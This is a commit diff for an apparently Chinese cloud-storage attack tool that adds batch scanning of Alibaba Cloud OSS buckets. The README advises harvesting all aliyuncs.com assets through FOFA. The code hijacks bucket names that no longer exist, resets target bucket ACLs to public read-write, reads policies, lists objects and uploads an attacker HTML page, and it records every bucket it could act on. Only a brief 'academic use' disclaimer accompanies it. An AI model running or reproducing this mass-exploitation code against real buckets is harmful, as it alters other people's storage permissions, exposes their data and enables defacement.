新增存储桶批量扫描功能

2025-11-05 10:44:04 +00:00 · 2022-03-06 21:28:14 +08:00 · 2022-03-06 21:28:14 +08:00 · 8b6705b90e
commit 8b6705b90e
parent 6276fe97e3
4 changed files with 86 additions and 25 deletions
--- a/README.md
+++ b/README.md
@ -1,21 +1,28 @@
-# Cloud-Bucket-Leak-Detection-Tools
+[TOC]
 # :rooster:0x00 前言
 想写个存储桶的利用，先给自己画个饼
-**画饼进度**
+工具名称我都没想好，相比大佬们看到项目名就知道...机翻王
 如果觉得用的还行，可以提issue给工具起个名字？:sos:
 :waning_crescent_moon:**画饼进度**
 1、阿里云存储桶利用
 不太会用Git，代码写的也烂，有BUG直接提Issue即可（好像我连issue可能都用不明白）
-# 0x00 依赖
+> 好在二爷给我推荐的GitHub Desktop 二爷YYDS
 # :pill:0x01 依赖
 + pip3 install oss2
 + pip3 install colorlog
 + pip3 install logging
 + pip3 argparse
-# 0x01 使用方法
+# :gun:0x02 使用方法
 ```bash
 git clone https://github.com/UzJu/Cloud-Bucket-Leak-Detection-Tools.git
@ -38,6 +45,31 @@ python3 main.py -h
 ![image-20220304185434168](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImageimage-20220304185434168.png)
 ## 3、批量检测存储桶
 新增批量存储桶的检测功能，推荐fofa一键导出所有资产
 **fofa**
 ```bash
 domain="aliyuncs.com"
 server="AliyunOSS"domain="aliyuncs.com" #不推荐该语法
 ```
 ```bash
 python3 main.py -f filepath
 ```
 随后等待即可，扫描结果会在results目录下，文件名为当天的日期
 ![image-20220306211140577](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImageimage-20220306211140577.png)
 ![image-20220306211025275](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImageimage-20220306211025275.png)
 只会保存有权限操作的存储桶
 ![image-20220306211225341](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImageimage-20220306211225341.png)
 输入存储桶地址即可自动检测，功能如下
 + 1、检测当前存储桶是否可劫持
@ -46,8 +78,9 @@ python3 main.py -h
 + 3、检测当前存储桶是否可获取ACL
 + 4、检测当前存储桶是否可获取Policy策略表
 + 5、检测存储桶是否可上传Object
 + 6、批量检测功能
-## 一、阿里云存储桶利用
+# 0x03 阿里云存储桶利用
 ### 1、实现思路
@ -75,7 +108,21 @@ python3 main.py -h
  + 尝试上传一个文件，是否可以成功上传
 ### 
 # :older_man:0x040001 更新日志
 **2022年3月6日**
 + 新增批量扫描功能
 + 修复Fake_UserAgent报错的问题
 > 其实是直接把这个库删了，不用了^ ^
 # :cop:0xffffffff 免责声明
 免责声明
 1、本工具只作为学术交流，禁止使用工具做违法的事情
 2、只是写着玩
--- a/config/conf.py
+++ b/config/conf.py
@ -21,3 +21,4 @@
 AliyunAccessKey_ID = ""
 AliyunAccessKey_Secret = ""
--- a/core/aliyunOss.py
+++ b/core/aliyunOss.py
@ -19,24 +19,27 @@ from config import conf
 import logging
 import os
 import csv
 import datetime
 module_logger = logging.getLogger("mainModule.AliyunOss")
 NowTime = datetime.datetime.now().strftime('%Y-%m-%d')
-def putCsvInfoResult(target, info):
+def results(target, info):
-    with open(f'{os.getcwd()}/results/{target}.csv', 'a+', newline='') as f:
+    headers = ['存储桶地址', '权限']
-        f_csv = csv.writer(f)
+    filepath = f'{os.getcwd()}/results/{NowTime}.csv'
    rows = [
        [f"{target}", info]
    ]
-        f_csv.writerows(rows)
+    if not os.path.isfile(filepath):
-
+        with open(filepath, 'a+', newline='') as f:
-
+            f = csv.writer(f)
-def setCsvHeaders(target):
+            f.writerow(headers)
-    headers = ['存储桶地址', '权限']
+            f.writerows(rows)
-    with open(f'{os.getcwd()}/results/{target}.csv', 'a+', newline='') as f:
+    else:
        with open(filepath, 'a+', newline='') as f:
            f_csv = csv.writer(f)
-        f_csv.writerow(headers)
+            f_csv.writerows(rows)
 class OssBucketExploitFromSDK:
@ -116,10 +119,7 @@ class OssBucketCheckFromSDK:
        auth = oss2.Auth(conf.AliyunAccessKey_ID, conf.AliyunAccessKey_Secret)
        self.bucket = oss2.Bucket(auth, f'http://{location}.aliyuncs.com', self.target)
        self.Exploit = OssBucketExploitFromSDK(self.target, location)
-        # 设置csvHeaders头
+        self.results_list = []
        # setCsvHeaders(f"{target}.{location}.aliyuncs.com")
        self.headers = [['Bucket', 'ListObject', 'GetBucketPolicy', 'PutBucketPolicy', 'GetBucketAcl', 'PutBucketAcl', 'PutBucketObject']]
        self.CheckResult = []
    def AliyunOssPutBucketPolicy(self, getOssResource):
        """
@ -138,6 +138,7 @@ class OssBucketCheckFromSDK:
            result = self.bucket.get_bucket_policy()
            policy_json = json.loads(result.policy)
            self.logger.info(f"Target: {self.target}, get Bucket Policy:)\n{policy_json}")
            self.results_list.append("GetBucketPolicy")
        except oss2.exceptions.AccessDenied:
            self.logger.warning(f"Target: {self.target}, Bucket Policy AccessDenied:(")
@ -147,6 +148,7 @@ class OssBucketCheckFromSDK:
            self.logger.info(f"Target: {self.target}, Bucket Exist:)")
            return True
        except oss2.exceptions.NoSuchBucket:
            self.results_list.append("NoSuckBucket_HiJack")
            self.logger.warning(f"Target: {self.target}, NoSuckBucket:) Now Hijack Bucket")
            self.Exploit.AliyunOssCreateBucket_Exp()
            return False
@ -159,13 +161,15 @@ class OssBucketCheckFromSDK:
    def AliyunOssGetBucketAcl(self):
        try:
            self.logger.info(f"Target: {self.target} Bucket Acl: {self.bucket.get_bucket_acl().acl}")
            self.results_list.append("GetBucketAcl")
        except oss2.exceptions.AccessDenied:
            self.logger.warning(f"Target: {self.target} get Bucket Acl AccessDenied:(")
-    def AliyunOssPutbucketAcl(self):
+    def AliyunOssPutBucketAcl(self):
        try:
            self.bucket.put_bucket_acl(oss2.BUCKET_ACL_PUBLIC_READ_WRITE)
            self.logger.info(f"Target: {self.target} Put Bucket Acl Success:)")
            self.results_list.append("PutBucketAcl")
        except oss2.exceptions.AccessDenied:
            self.logger.warning(f"Target: {self.target} Put Bucket Acl AccessDenied:(")
@ -174,6 +178,7 @@ class OssBucketCheckFromSDK:
            self.logger.info("Try to list Object")
            for Object in islice(oss2.ObjectIterator(self.bucket), 3):
                self.logger.info(f"Object Name: {Object.key}")
            self.results_list.append("GetBucketObjectList")
        except oss2.exceptions.AccessDenied:
            self.logger.warning(f"Target: {self.target} ListObject AccessDenid")
            return
@ -185,9 +190,13 @@ class OssBucketCheckFromSDK:
            self.bucket.put_object_from_file('UzJu.txt', f'{os.getcwd()}/config/UzJu.html')
            self.logger.info(f"Target: {self.target} Put Object Success:)")
            self.logger.info(f"Go Browser Open {self.target}.{self.location}.aliyuncs.com/UzJu.html")
            self.results_list.append("PutBucketObject")
        except oss2.exceptions.AccessDenied:
            self.logger.warning(f"Target: {self.target} Put Object AccessDenied:(")
    def CheckResult(self):
        return self.results_list
 def CheckBucket(target, location):
    try:
@ -197,6 +206,10 @@ def CheckBucket(target, location):
            check.AliyunOssGetBucketAcl()
            check.AliyunOssGetBucketPolicy()
            check.AliyunOssPutBucketObject()
        if not check.CheckResult():
            pass
        else:
            results(f"{target}.{location}.aliyuncs.com", check.CheckResult())
        module_logger.info(">" * 80)
    except Exception as e:
        module_logger.error(f"Target: {target} Chceck Faild:( {e}")
--- a/main.py
+++ b/main.py
@ -17,7 +17,7 @@ import requests
 import argparse
 from core import aliyunOss
-NowTime = datetime.datetime.now().strftime('%Y-%m-%d_%H_%M_%S')
+NowTime = datetime.datetime.now().strftime('%Y-%m-%d')
 logger = logging.getLogger("mainModule")
 log_colors_config = {
`@ -21,3 +21,4 @@`

	`AliyunAccessKey_ID = ""`	`AliyunAccessKey_ID = ""`
	`AliyunAccessKey_Secret = ""`	`AliyunAccessKey_Secret = ""`